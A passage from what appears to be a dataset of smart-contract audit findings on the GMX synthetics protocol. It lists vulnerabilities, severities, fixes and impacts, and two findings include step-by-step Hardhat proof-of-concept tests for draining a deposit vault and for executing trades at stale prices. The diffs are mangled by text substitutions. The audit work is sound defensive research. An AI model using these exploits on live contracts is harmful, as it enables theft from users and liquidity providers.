reasonBytes\\n );\\n }\\n }\\n```\\n\\nFor the attack to succeed, the keeper needs to make `this._executeDeposit` revert. Due to the 64/63 rule the attack will succeed if both of the following conditions meet:\\n63/64 of the supplied gas will cause an out of gas in the `try` statement\\n1/64 of the supplied gas is enough to execute the `catch` statement.\\nConsidering `2000000` is the max callback limit and native token transfer gas limit is large enough to support contracts the above conditions can be met.",Add a buffer of gas that needs to be supplied to the execute function to make sure the `try` statement will not revert because of out of gas.,Keeper can remove all deposits/withdrawals/orders from the protocol.\\nEssentially stealing all execution fees paid\\nKeeper can create deposits and by leveraging the bug can cancel them when executing while receiving rewards.\\nVaults will be drained,"```\\nfunction executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams calldata oracleParams\\n ) external\\n globalNonReentrant\\n onlyOrderKeeper\\n withOraclePrices(oracle, dataStore, eventEmitter, oracleParams)\\n {\\n uint256 startingGas = gasleft();\\n\\n try this._executeDeposit(\\n key,\\n oracleParams,\\n msg.sender,\\n startingGas\\n ) {\\n } catch (bytes memory reasonBytes) {\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n }\\n }\\n```\\n" +WNT in depositVault can be drained by abusing initialLongToken/initialShortToken of CreateDepositParams,high,"The attacker can abuse the initialLongToken/initialShortToken of `CreateDepositParams` to drain all the WNT from depositVault.\\n```\\n function createDeposit(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n DepositVault depositVault,\\n address account,\\n CreateDepositParams memory params\\n ) external returns (bytes32) {\\n Market.Props memory market = MarketUtils.getEnabledMarket(dataStore, params.market);\\n\\n uint256 initialLongTokenAmount = depositVault.recordTransferIn(params.initialLongToken);\\n uint256 initialShortTokenAmount = depositVault.recordTransferIn(params.initialShortToken);\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n if (market.longToken == wnt) {\\n initialLongTokenAmount -= params.executionFee;\\n } else if (market.shortToken == wnt) {\\n initialShortTokenAmount -= params.executionFee;\\n```\\n\\nThe `initialLongToken` and `initialShortToken` of `CreateDepositParams` can be set to any token address and there is no check for the `initialLongToken` and `initialShortToken` during `createDeposit`. The attacker can set initialLongToken/initialShortToken to a token(USDC e.g.) with less value per unit than WNT and for a market with `market.longToken == wnt` or `market.shortToken == wnt`, `params.executionFee` will be wrongly subtracted from `initialLongTokenAmount` or `initialLongTokenAmount`. This allows the attacker to have a controllable large `params.executionFee` by sending tokens with less value. By calling `cancelDeposit`, `params.executionFee` amount of WNT will be repaid to the attacker.\\nHere is a PoC test case that drains WNT from depositVault:\\n```\\ndiff --git a/gmx-synthetics/test/router/ExchangeRouter.ts b/gmx-synthetics/test/router/ExchangeRouter.ts\\nindex 7eca238..c40a71c 100644\\n--- a/gmx-synthetics/test/router/ExchangeRouter.ts\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/gmx-synthetics/test/router/ExchangeRouter.ts\\n@@ -103,6 // Add the line below\\n103,82 @@ describe(""ExchangeRouter"", () => {\\n });\\n });\\n \\n// Add the line below\\n it(""createDepositPoC"", async () => {\\n// Add the line below\\n // simulate normal user deposit\\n// Add the line below\\n await usdc.mint(user0.address, expandDecimals(50 * 1000, 6));\\n// Add the line below\\n await usdc.connect(user0).approve(router.address, expandDecimals(50 * 1000, 6));\\n// Add the line below\\n const tx = await exchangeRouter.connect(user0).multicall(\\n// Add the line below\\n [\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(""sendWnt"", [depositVault.address, expandDecimals(11, 18)]),\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(""sendTokens"", [\\n// Add the line below\\n usdc.address,\\n// Add the line below\\n depositVault.address,\\n// Add the line below\\n expandDecimals(50 * 1000, 6),\\n// Add the line below\\n ]),\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(""createDeposit"", [\\n// Add the line below\\n {\\n// Add the line below\\n receiver: user0.address,\\n// Add the line below\\n callbackContract: user2.address,\\n// Add the line below\\n market: ethUsdMarket.marketToken,\\n// Add the line below\\n initialLongToken: ethUsdMarket.longToken,\\n// Add the line below\\n initialShortToken: ethUsdMarket.shortToken,\\n// Add the line below\\n longTokenSwapPath: [ethUsdMarket.marketToken, ethUsdSpotOnlyMarket.marketToken],\\n// Add the line below\\n shortTokenSwapPath: [ethUsdSpotOnlyMarket.marketToken, ethUsdMarket.marketToken],\\n// Add the line below\\n minMarketTokens: 100,\\n// Add the line below\\n shouldUnwrapNativeToken: true,\\n// Add the line below\\n executionFee,\\n// Add the line below\\n callbackGasLimit: ""200000"",\\n// Add the line below\\n },\\n// Add the line below\\n ]),\\n// Add the line below\\n ],\\n// Add the line below\\n { value: expandDecimals(11, 18) }\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // depositVault has WNT balance now\\n// Add the line below\\n let vaultWNTBalance = await wnt.balanceOf(depositVault.address);\\n// Add the line below\\n expect(vaultWNTBalance.eq(expandDecimals(11, 18)));\\n// Add the line below\\n\\n// Add the line below\\n // user1 steal WNT from depositVault\\n// Add the line below\\n await usdc.mint(user1.address, vaultWNTBalance.add(1));\\n// Add the line below\\n await usdc.connect(user1).approve(router.address, vaultWNTBalance.add(1));\\n// Add the line below\\n\\n// Add the line below\\n // Step 1. create deposit with malicious initialLongToken\\n// Add the line below\\n await exchangeRouter.connect(user1).multicall(\\n// Add the line below\\n [\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(""sendTokens"", [\\n// Add the line below\\n usdc.address,\\n// Add the line below\\n depositVault.address,\\n// Add the line below\\n vaultWNTBalance.add(1),\\n// Add the line below\\n ]),\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(""createDeposit"", [\\n// Add the line below\\n {\\n// Add the line below\\n receiver: user1.address,\\n// Add the line below\\n callbackContract: user2.address,\\n// Add the line below\\n market: ethUsdMarket.marketToken,\\n// Add the line below\\n initialLongToken: usdc.address, // use usdc instead of WNT\\n// Add the line below\\n initialShortToken: ethUsdMarket.shortToken,\\n// Add the line below\\n longTokenSwapPath: [],\\n// Add the line below\\n shortTokenSwapPath: [],\\n// Add the line below\\n minMarketTokens: 0,\\n// Add the line below\\n shouldUnwrapNativeToken: true,\\n// Add the line below\\n executionFee: vaultWNTBalance,\\n// Add the line below\\n callbackGasLimit: ""0"",\\n// Add the line below\\n },\\n// Add the line below\\n ]),\\n// Add the line below\\n ],\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // Step 2. cancel deposit to drain WNT\\n// Add the line below\\n const depositKeys = await getDepositKeys(dataStore, 0, 2);\\n// Add the line below\\n // const deposit = await reader.getDeposit(dataStore.address, depositKeys[1]);\\n// Add the line below\\n // console.log(deposit);\\n// Add the line below\\n // console.log(depositKeys[1]);\\n// Add the line below\\n await expect(exchangeRouter.connect(user1).cancelDeposit(depositKeys[1]));\\n// Add the line below\\n\\n// Add the line below\\n // WNT is drained from depositVault\\n// Add the line below\\n expect(await wnt.balanceOf(depositVault.address)).eq(0);\\n// Add the line below\\n });\\n// Add the line below\\n\\n it(""createOrder"", async () => {\\n const referralCode = hashString(""referralCode"");\\n await usdc.mint(user0.address, expandDecimals(50 * 1000, 6));\\n```\\n","```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol b/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol\\nindex fae1b46..2811a6d 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol\\n@@ // Remove the line below\\n74,9 // Add the line below\\n74,9 @@ library DepositUtils {\\n \\n address wnt = TokenUtils.wnt(dataStore);\\n \\n// Remove the line below\\n if (market.longToken == wnt) {\\n// Add the line below\\n if (params.initialLongToken == wnt) {\\n initialLongTokenAmount // Remove the line below\\n= params.executionFee;\\n// Remove the line below\\n } else if (market.shortToken == wnt) {\\n// Add the line below\\n } else if (params.initialShortToken == wnt) {\\n initialShortTokenAmount // Remove the line below\\n= params.executionFee;\\n } else {\\n uint256 wntAmount = depositVault.recordTransferIn(wnt);\\n```\\n",The malicious user can drain all WNT from depositVault.,"```\\n function createDeposit(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n DepositVault depositVault,\\n address account,\\n CreateDepositParams memory params\\n ) external returns (bytes32) {\\n Market.Props memory market = MarketUtils.getEnabledMarket(dataStore, params.market);\\n\\n uint256 initialLongTokenAmount = depositVault.recordTransferIn(params.initialLongToken);\\n uint256 initialShortTokenAmount = depositVault.recordTransferIn(params.initialShortToken);\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n if (market.longToken == wnt) {\\n initialLongTokenAmount -= params.executionFee;\\n } else if (market.shortToken == wnt) {\\n initialShortTokenAmount -= params.executionFee;\\n```\\n" +Incorrect function call leads to stale borrowing fees,high,"Due to an incorrect function call while getting the total borrow fees, the returned fees will be an inaccurate and stale amount. Which will have an impact on liquidity providers\\nAs said the function getTotalBorrowingFees:\\n```\\nfunction getTotalBorrowingFees(DataStore dataStore, address market, address longToken, address shortToken, bool isLong) internal view returns (uint256) {\\n uint256 openInterest = getOpenInterest(dataStore, market, longToken, shortToken, isLong);\\n uint256 cumulativeBorrowingFactor = getCumulativeBorrowingFactor(dataStore, market, isLong);\\n uint256 totalBorrowing = getTotalBorrowing(dataStore, market, isLong);\\n return openInterest * cumulativeBorrowingFactor - totalBorrowing;\\n}\\n```\\n\\ncalculates the fess by calling getCumulativeBorrowingFactor(...):\\nwhich is the wrong function to call because it returns a stale borrowing factor. To get the actual borrowing factor and calculate correctly the borrowing fees, GMX should call the `getNextCumulativeBorrowingFactor` function:\\nWhich makes the right calculation, taking into account the stale fees also:\\n```\\n uint256 durationInSeconds = getSecondsSinceCumulativeBorrowingFactorUpdated(dataStore, market.marketToken, isLong);\\n uint256 borrowingFactorPerSecond = getBorrowingFactorPerSecond(\\n dataStore,\\n market,\\n prices,\\n isLong\\n );\\n\\n uint256 cumulativeBorrowingFactor = getCumulativeBorrowingFactor(dataStore, market.marketToken, isLong);\\n\\n uint256 delta = durationInSeconds * borrowingFactorPerSecond;\\n uint256 nextCumulativeBorrowingFactor = cumulativeBorrowingFactor + delta;\\n return (nextCumulativeBorrowingFactor, delta);\\n```\\n","In order to mitigate the issue, call the function `getNextCumulativeBorrowingFactor` instead of the function `getCumulativeBorrowingFactor()` for a correct accounting and not getting stale fees","Ass fee calculation will not be accurate, liquidity providers will be have a less-worth token because pending fees are not accounted in the pool's value","```\\nfunction getTotalBorrowingFees(DataStore dataStore, address market, address longToken, address shortToken, bool isLong) internal view returns (uint256) {\\n uint256 openInterest = getOpenInterest(dataStore, market, longToken, shortToken, isLong);\\n uint256 cumulativeBorrowingFactor = getCumulativeBorrowingFactor(dataStore, market, isLong);\\n uint256 totalBorrowing = getTotalBorrowing(dataStore, market, isLong);\\n return openInterest * cumulativeBorrowingFactor - totalBorrowing;\\n}\\n```\\n" +Limit orders can be used to get a free look into the future,high,"Users can continually update their orders to get a free look into prices in future blocks\\nOrder execution relies on signed archived prices from off-chain oracles, where each price is stored along with the block range it applies to, and limit orders are only allowed to execute with oracle prices where the block is greater than the block in which the order was last updated. Since prices are required to be future prices, there is a time gap between when the last signed price was archived, and the new price for the next block is stored in the archive, and the order keeper is able to fetch it and submit an execution for it in the next block.\\nThe example given by the sponsor in discord was:\\n```\\nthe oracle process:\\n\\n1. the oracle node checks the latest price from reference exchanges and stores it with the oracle node's timestamp, e.g. time: 1000\\n2. the oracle node checks the latest block of the blockchain, e.g. block 100, it stores this with the oracle node's timestamp as well\\n3. the oracle node signs minOracleBlockNumber: 100, maxOracleBlockNumber: 100, timestamp: 1000, price: \\n4. the next time the loop runs is at time 1001, if the latest block of the blockchain is block 105, e.g. if 5 blocks were produced in that one second, then the oracle would sign\\nminOracleBlockNumber: 101, maxOracleBlockNumber: 105, timestamp: 1001, price: \\n```\\n","Require a delay between when the order was last increased/submitted, and when an update is allowed, similar to REQUEST_EXPIRATION_BLOCK_AGE for the cancellation of market orders","If a user has a pending exit order that was submitted a block N, and the user sees that the price at block N+1 will be more favorable, they can update their exit order, changing the amount by +/- 1 wei, and have the order execution delayed until the next block, at which point they can decided again whether the price and or impact is favorable, and whether to exit. In the sponsor's example, if the order was submitted at block 101, they have until block 105 to decide whether to update their order, since the order execution keeper won't be able to do the execution until block 106. There is a gas cost for doing such updates, but if the position is large enough, or the price is gapping enough, it is worth while to do this, especially if someone comes up with an automated service that does this on your behalf.\\nThe more favorable price for the attacker is at the expense of the other side of the trade, and is a loss of capital for them.","```\\nthe oracle process:\\n\\n1. the oracle node checks the latest price from reference exchanges and stores it with the oracle node's timestamp, e.g. time: 1000\\n2. the oracle node checks the latest block of the blockchain, e.g. block 100, it stores this with the oracle node's timestamp as well\\n3. the oracle node signs minOracleBlockNumber: 100, maxOracleBlockNumber: 100, timestamp: 1000, price: \\n4. the next time the loop runs is at time 1001, if the latest block of the blockchain is block 105, e.g. if 5 blocks were produced in that one second, then the oracle would sign\\nminOracleBlockNumber: 101, maxOracleBlockNumber: 105, timestamp: 1001, price: \\n```\\n" +Creating an order of type MarketIncrease opens an attack vector where attacker can execute txs with stale prices by inputting a very extense swapPath,high,"The vulnerability relies on the create order function:\\n```\\n function createOrder(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n OrderVault orderVault,\\n IReferralStorage referralStorage,\\n address account,\\n BaseOrderUtils.CreateOrderParams memory params\\n ) external returns (bytes32) {\\n ReferralUtils.setTraderReferralCode(referralStorage, account, params.referralCode);\\n\\n uint256 initialCollateralDeltaAmount;\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n bool shouldRecordSeparateExecutionFeeTransfer = true;\\n\\n if (\\n params.orderType == Order.OrderType.MarketSwap ||\\n params.orderType == Order.OrderType.LimitSwap ||\\n params.orderType == Order.OrderType.MarketIncrease ||\\n params.orderType == Order.OrderType.LimitIncrease\\n ) {\\n initialCollateralDeltaAmount = orderVault.recordTransferIn(params.addresses.initialCollateralToken);\\n if (params.addresses.initialCollateralToken == wnt) {\\n if (initialCollateralDeltaAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(initialCollateralDeltaAmount, params.numbers.executionFee);\\n }\\n initialCollateralDeltaAmount -= params.numbers.executionFee;\\n shouldRecordSeparateExecutionFeeTransfer = false;\\n }\\n } else if (\\n params.orderType == Order.OrderType.MarketDecrease ||\\n params.orderType == Order.OrderType.LimitDecrease ||\\n params.orderType == Order.OrderType.StopLossDecrease\\n ) {\\n initialCollateralDeltaAmount = params.numbers.initialCollateralDeltaAmount;\\n } else {\\n revert OrderTypeCannotBeCreated(params.orderType);\\n }\\n\\n if (shouldRecordSeparateExecutionFeeTransfer) {\\n uint256 wntAmount = orderVault.recordTransferIn(wnt);\\n if (wntAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(wntAmount, params.numbers.executionFee);\\n }\\n\\n GasUtils.handleExcessExecutionFee(\\n dataStore,\\n orderVault,\\n wntAmount,\\n params.numbers.executionFee\\n );\\n }\\n\\n // validate swap path markets\\n MarketUtils.getEnabledMarkets(\\n dataStore,\\n params.addresses.swapPath\\n );\\n\\n Order.Props memory order;\\n\\n order.setAccount(account);\\n order.setReceiver(params.addresses.receiver);\\n order.setCallbackContract(params.addresses.callbackContract);\\n order.setMarket(params.addresses.market);\\n order.setInitialCollateralToken(params.addresses.initialCollateralToken);\\n order.setSwapPath(params.addresses.swapPath);\\n order.setOrderType(params.orderType);\\n order.setDecreasePositionSwapType(params.decreasePositionSwapType);\\n order.setSizeDeltaUsd(params.numbers.sizeDeltaUsd);\\n order.setInitialCollateralDeltaAmount(initialCollateralDeltaAmount);\\n order.setTriggerPrice(params.numbers.triggerPrice);\\n order.setAcceptablePrice(params.numbers.acceptablePrice);\\n order.setExecutionFee(params.numbers.executionFee);\\n order.setCallbackGasLimit(params.numbers.callbackGasLimit);\\n order.setMinOutputAmount(params.numbers.minOutputAmount);\\n order.setIsLong(params.isLong);\\n order.setShouldUnwrapNativeToken(params.shouldUnwrapNativeToken);\\n\\n ReceiverUtils.validateReceiver(order.receiver());\\n\\n if (order.initialCollateralDeltaAmount() == 0 && order.sizeDeltaUsd() == 0) {\\n revert BaseOrderUtils.EmptyOrder();\\n }\\n\\n CallbackUtils.validateCallbackGasLimit(dataStore, order.callbackGasLimit());\\n\\n uint256 estimatedGasLimit = GasUtils.estimateExecuteOrderGasLimit(dataStore, order);\\n GasUtils.validateExecutionFee(dataStore, estimatedGasLimit, order.executionFee());\\n\\n bytes32 key = NonceUtils.getNextKey(dataStore);\\n\\n order.touch();\\n OrderStoreUtils.set(dataStore, key, order);\\n\\n OrderEventUtils.emitOrderCreated(eventEmitter, key, order);\\n\\n return key;\\n}\\n```\\n\\nSpecifically, on a marketIncrease OrderType. Executing an order type of marketIncrease opens an attack path where you can execute transactions with stale prices.\\nThe way to achieve this, is by creating a market increase order and passing a very extensive swapPath in params:\\n```\\n BaseOrderUtils.CreateOrderParams memory params\\n\\n\\n struct CreateOrderParams {\\n CreateOrderParamsAddresses addresses;\\n CreateOrderParamsNumbers numbers;\\n Order.OrderType orderType;\\n Order.DecreasePositionSwapType decreasePositionSwapType;\\n bool isLong;\\n bool shouldUnwrapNativeToken;\\n bytes32 referralCode;\\n }\\n\\n struct CreateOrderParamsAddresses {\\n address receiver;\\n address callbackContract;\\n address market;\\n address initialCollateralToken;\\n address[] swapPath; //HEREE <--------------------------------------------------------\\n }\\n\\nThe swap path has to be as long as it gets close to the gasLimit of the block.\\n```\\n\\nAfter calling marketIncrease close to gasLimit then using the callback contract that you passed as a param in:\\nan exceeding the block.gasLimit in the callback.\\nAfter ""x"" amount of blocks, change the gasUsage on the fallback, just that the transaction executes at the prior price.\\nPoC on how to execute the transaction with old pricing:\\n```\\nimport { expect } from ""chai"";\\nimport { mine } from ""@nomicfoundation/hardhat-network-helpers"";\\nimport { OrderType, getOrderCount, getOrderKeys, createOrder, executeOrder, handleOrder } from ""../utils/order"";\\nimport { expandDecimals, decimalToFloat } from ""../utils/math"";\\nimport { deployFixture } from ""../utils/fixture"";\\n import { handleDeposit } from ""../utils/deposit"";\\nimport { getPositionCount, getAccountPositionCount } from ""../utils/position"";\\n\\ndescribe(""Execute transaction with all prices"", () => {\\nlet fixture,\\nuser0,\\nuser1,\\nuser2,\\nreader,\\ndataStore,\\nethUsdMarket,\\nethUsdSpotOnlyMarket,\\nwnt,\\nusdc,\\nattackContract,\\noracle,\\ndepositVault,\\nexchangeRouter,\\nswapHandler,\\nexecutionFee;\\n\\n beforeEach(async () => {\\n fixture = await deployFixture();\\n\\n ({ user0, user1, user2 } = fixture.accounts);\\n ({\\n reader,\\n dataStore,\\n oracle,\\n depositVault,\\n ethUsdMarket,\\n ethUsdSpotOnlyMarket,\\n wnt,\\n usdc,\\n attackContract,\\n exchangeRouter,\\n swapHandler,\\n } = fixture.contracts);\\n ({ executionFee } = fixture.props);\\n\\n await handleDeposit(fixture, {\\n create: {\\n market: ethUsdMarket,\\n longTokenAmount: expandDecimals(10000000, 18),\\n shortTokenAmount: expandDecimals(10000000 * 5000, 6),\\n },\\n });\\n await handleDeposit(fixture, {\\n create: {\\n market: ethUsdSpotOnlyMarket,\\n longTokenAmount: expandDecimals(10000000, 18),\\n shortTokenAmount: expandDecimals(10000000 * 5000, 6),\\n },\\n });\\n });\\n\\n it(""Old price order execution"", async () => {\\n const path = [];\\n const UsdcBal = expandDecimals(50 * 1000, 6);\\n expect(await getOrderCount(dataStore)).eq(0);\\n\\n for (let i = 0; i < 63; i++) {\\n if (i % 2 == 0) path.push(ethUsdMarket.marketToken);\\n else path.push(ethUsdSpotOnlyMarket.marketToken);\\n }\\n\\n const params = {\\n account: attackContract,\\n callbackContract: attackContract,\\n callbackGasLimit: 1900000,\\n market: ethUsdMarket,\\n minOutputAmount: 0,\\n initialCollateralToken: usdc, // Collateral will get swapped to ETH by the swapPath -- 50k/$5k = 10 ETH Collateral\\n initialCollateralDeltaAmount: UsdcBal,\\n swapPath: path,\\n sizeDeltaUsd: decimalToFloat(200 * 1000), // 4x leverage -- position size is 40 ETH\\n acceptablePrice: expandDecimals(5001, 12),\\n orderType: OrderType.MarketIncrease,\\n isLong: true,\\n shouldUnwrapNativeToken: false,\\n gasUsageLabel: ""createOrder"",\\n };\\n\\n // Create a MarketIncrease order that will run out of gas doing callback\\n await createOrder(fixture, params);\\n expect(await getOrderCount(dataStore)).eq(1);\\n expect(await getAccountPositionCount(dataStore, attackContract.address)).eq(0);\\n expect(await getPositionCount(dataStore)).eq(0);\\n expect(await getAccountPositionCount(dataStore, attackContract.address)).eq(0);\\n\\n await expect(executeOrder(fixture)).to.be.reverted;\\n\\n await mine(50);\\n\\n await attackContract.flipSwitch();\\n\\n expect(await getOrderCount(dataStore)).eq(1);\\n\\n await executeOrder(fixture, {\\n minPrices: [expandDecimals(5000, 4), expandDecimals(1, 6)],\\n maxPrices: [expandDecimals(5000, 4), expandDecimals(1, 6)],\\n });\\n\\n expect(await getOrderCount(dataStore)).eq(0);\\n expect(await getAccountPositionCount(dataStore, attackContract.address)).eq(1);\\n expect(await getPositionCount(dataStore)).eq(1);\\n\\n await handleOrder(fixture, {\\n create: {\\n account: attackContract,\\n market: ethUsdMarket,\\n initialCollateralToken: wnt,\\n initialCollateralDeltaAmount: 0,\\n sizeDeltaUsd: decimalToFloat(200 * 1000),\\n acceptablePrice: 6001,\\n orderType: OrderType.MarketDecrease,\\n isLong: true,\\n gasUsageLabel: ""orderHandler.createOrder"",\\n swapPath: [ethUsdMarket.marketToken],\\n },\\n execute: {\\n minPrices: [expandDecimals(6000, 4), expandDecimals(1, 6)],\\n maxPrices: [expandDecimals(6000, 4), expandDecimals(1, 6)],\\n gasUsageLabel: ""orderHandler.executeOrder"",\\n },\\n });\\n\\n const WNTAfter = await wnt.balanceOf(attackContract.address);\\n const UsdcAfter = await usdc.balanceOf(attackContract.address);\\n\\n expect(UsdcAfter).to.gt(\\n expandDecimals(100 * 1000, 6)\\n .mul(999)\\n .div(1000)\\n );\\n expect(UsdcAfter).to.lt(\\n expandDecimals(100 * 1000, 6)\\n .mul(1001)\\n .div(1000)\\n );\\n expect(WNTAfter).to.eq(0);\\n }).timeout(100000);\\n```\\n","There need to be a way to cap the length of the path to control user input:\\nuint y = 10; require(swapPath.length < y ,""path too long"");",The attack would allow to make free trades in terms of risk. You can trade without any risk by conttroling when to execute the transaction,"```\\n function createOrder(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n OrderVault orderVault,\\n IReferralStorage referralStorage,\\n address account,\\n BaseOrderUtils.CreateOrderParams memory params\\n ) external returns (bytes32) {\\n ReferralUtils.setTraderReferralCode(referralStorage, account, params.referralCode);\\n\\n uint256 initialCollateralDeltaAmount;\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n bool shouldRecordSeparateExecutionFeeTransfer = true;\\n\\n if (\\n params.orderType == Order.OrderType.MarketSwap ||\\n params.orderType == Order.OrderType.LimitSwap ||\\n params.orderType == Order.OrderType.MarketIncrease ||\\n params.orderType == Order.OrderType.LimitIncrease\\n ) {\\n initialCollateralDeltaAmount = orderVault.recordTransferIn(params.addresses.initialCollateralToken);\\n if (params.addresses.initialCollateralToken == wnt) {\\n if (initialCollateralDeltaAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(initialCollateralDeltaAmount, params.numbers.executionFee);\\n }\\n initialCollateralDeltaAmount -= params.numbers.executionFee;\\n shouldRecordSeparateExecutionFeeTransfer = false;\\n }\\n } else if (\\n params.orderType == Order.OrderType.MarketDecrease ||\\n params.orderType == Order.OrderType.LimitDecrease ||\\n params.orderType == Order.OrderType.StopLossDecrease\\n ) {\\n initialCollateralDeltaAmount = params.numbers.initialCollateralDeltaAmount;\\n } else {\\n revert OrderTypeCannotBeCreated(params.orderType);\\n }\\n\\n if (shouldRecordSeparateExecutionFeeTransfer) {\\n uint256 wntAmount = orderVault.recordTransferIn(wnt);\\n if (wntAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(wntAmount, params.numbers.executionFee);\\n }\\n\\n GasUtils.handleExcessExecutionFee(\\n dataStore,\\n orderVault,\\n wntAmount,\\n params.numbers.executionFee\\n );\\n }\\n\\n // validate swap path markets\\n MarketUtils.getEnabledMarkets(\\n dataStore,\\n params.addresses.swapPath\\n );\\n\\n Order.Props memory order;\\n\\n order.setAccount(account);\\n order.setReceiver(params.addresses.receiver);\\n order.setCallbackContract(params.addresses.callbackContract);\\n order.setMarket(params.addresses.market);\\n order.setInitialCollateralToken(params.addresses.initialCollateralToken);\\n order.setSwapPath(params.addresses.swapPath);\\n order.setOrderType(params.orderType);\\n order.setDecreasePositionSwapType(params.decreasePositionSwapType);\\n order.setSizeDeltaUsd(params.numbers.sizeDeltaUsd);\\n order.setInitialCollateralDeltaAmount(initialCollateralDeltaAmount);\\n order.setTriggerPrice(params.numbers.triggerPrice);\\n order.setAcceptablePrice(params.numbers.acceptablePrice);\\n order.setExecutionFee(params.numbers.executionFee);\\n order.setCallbackGasLimit(params.numbers.callbackGasLimit);\\n order.setMinOutputAmount(params.numbers.minOutputAmount);\\n order.setIsLong(params.isLong);\\n order.setShouldUnwrapNativeToken(params.shouldUnwrapNativeToken);\\n\\n ReceiverUtils.validateReceiver(order.receiver());\\n\\n if (order.initialCollateralDeltaAmount() == 0 && order.sizeDeltaUsd() == 0) {\\n revert BaseOrderUtils.EmptyOrder();\\n }\\n\\n CallbackUtils.validateCallbackGasLimit(dataStore, order.callbackGasLimit());\\n\\n uint256 estimatedGasLimit = GasUtils.estimateExecuteOrderGasLimit(dataStore, order);\\n GasUtils.validateExecutionFee(dataStore, estimatedGasLimit, order.executionFee());\\n\\n bytes32 key = NonceUtils.getNextKey(dataStore);\\n\\n order.touch();\\n OrderStoreUtils.set(dataStore, key, order);\\n\\n OrderEventUtils.emitOrderCreated(eventEmitter, key, order);\\n\\n return key;\\n}\\n```\\n" +Multiplication after Division error leading to larger precision loss,medium,"There are couple of instance of using result of a division for multiplication while can cause larger precision loss.\\n```\\nFile: MarketUtils.sol\\n\\n cache.fundingUsd = (cache.sizeOfLargerSide / Precision.FLOAT_PRECISION) * cache.durationInSeconds * cache.fundingFactorPerSecond;\\n\\n if (result.longsPayShorts) {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithLongCollateral / cache.oi.longOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithShortCollateral / cache.oi.longOpenInterest;\\n } else {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithLongCollateral / cache.oi.shortOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithShortCollateral / cache.oi.shortOpenInterest;\\n }\\n```\\n\\nLink to Code\\nIn above case, value of `cache.fundingUsd` is calculated by first dividing `cache.sizeOfLargerSide` with `Precision.FLOAT_PRECISION` which is `10**30`. Then the resultant is multiplied further. This result in larger Loss of precision.\\nLater the same `cache.fundingUsd` is used to calculate `cache.fundingUsdForLongCollateral` and `cache.fundingUsdForShortCollateral` by multiplying further which makes the precision error even more big.\\nSame issue is there in calculating `cache.positionPnlUsd` in `PositionUtils`.\\n```\\nFile: PositionUtils.sol\\n\\n if (position.isLong()) {\\n cache.sizeDeltaInTokens = Calc.roundUpDivision(position.sizeInTokens() * sizeDeltaUsd, position.sizeInUsd());\\n } else {\\n cache.sizeDeltaInTokens = position.sizeInTokens() * sizeDeltaUsd / position.sizeInUsd();\\n }\\n }\\n\\n cache.positionPnlUsd = cache.totalPositionPnl * cache.sizeDeltaInTokens.toInt256() / position.sizeInTokens().toInt256();\\n```\\n\\nLink to Code",First Multiply all the numerators and then divide it by the product of all the denominator.,Precision Loss in accounting.,```\\nFile: MarketUtils.sol\\n\\n cache.fundingUsd = (cache.sizeOfLargerSide / Precision.FLOAT_PRECISION) * cache.durationInSeconds * cache.fundingFactorPerSecond;\\n\\n if (result.longsPayShorts) {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithLongCollateral / cache.oi.longOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithShortCollateral / cache.oi.longOpenInterest;\\n } else {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithLongCollateral / cache.oi.shortOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithShortCollateral / cache.oi.shortOpenInterest;\\n }\\n```\\n +"when execute deposit fails, cancel deposit will be called which means that execution fee for keeper will be little for executing the cancellation depending on where the executeDeposit fails",medium,"When execute deposit fails, the deposit will be automatically cancelled. However, since executeDeposit has taken up a portion of the execution fee, execution fee left for cancellation might be little and keeper will lose out on execution fee.\\nIn `executeDeposit` when an error is thrown, `_handleDepositError` is called.\\n```\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n```\\n\\nNotice that in `_handleDepositError` that `cancelDeposit` is called which will pay execution fee to the keeper. However, since the failure can have failed at the late stage of executeDeposit, the execution fee left for the cancellation will be little for the keeper.\\n```\\n function _handleDepositError(\\n bytes32 key,\\n uint256 startingGas,\\n bytes memory reasonBytes\\n ) internal {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n\\n\\n bytes4 errorSelector = 